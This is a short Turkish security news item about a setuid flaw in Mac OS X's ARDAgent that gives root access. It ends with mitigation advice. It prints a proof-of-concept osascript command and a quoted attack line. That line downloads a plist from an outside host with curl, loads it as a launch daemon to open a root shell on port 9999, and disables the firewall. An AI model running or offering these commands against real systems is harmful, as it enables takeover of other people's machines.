Mac OS X 10.4 ve 10.5 üzerinde kritik olarak nitelendirilen bir güvenlik açığı tespit edildi. Bu açık ile birlikte kurbanın bilgisayarında uzaktan ya da yerel olarak root haklarına sahip olunabiliyor. Mac OS X'te bulunan uzaktan kontrol sistemi ARDAgent'in setuid'e sahip olması yani yapılan isteğin, isteği yapan kişinin izinleriyle yapması ile güvenlik açığı aktif hale gelebiliyor.
Örnek olarak şu komut konsolda çalıştırıldığında güvenlik zaafiyeti görülmekte,
osascript -e 'tell app "ARDAgent" to do shell script "whoami"';Slashdot'da konuyla ilgili yapılan tartışma içerisinde başka saldırı örnekleri de verilmekte.
osascript -e 'tell app "ARDAgent" to do shell script "cd /System/Library/LaunchDaemons ; curl -o bash.plist http://cdslash.net/temp/bash.plist [cdslash.net] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start com.apple.bash ; ipfw disable firewall; launchctl "'Komutu TCP 9999 portunu açılabiliyor.
Çözüm:
System Settings/Sharing/ altında bulunan Remote Management özelliği aktif edilince güvenlik açığı sömürülemez hale geliyor. Bir başka öneri de Apple Remote Desktop'u Mac'inizden tamamen kaldırmak. Bunun için şu adresi inceleyebilirsiniz.
Referans:
http://www.intego.com/news/ism0802.asp
Son yorumlar
3 gün 19 saat önce
3 gün 20 saat önce
4 gün 10 saat önce
4 gün 11 saat önce
6 gün 7 saat önce
1 hafta 2 gün önce
3 hafta 14 saat önce
3 hafta 5 gün önce
3 hafta 6 gün önce
4 hafta 8 saat önce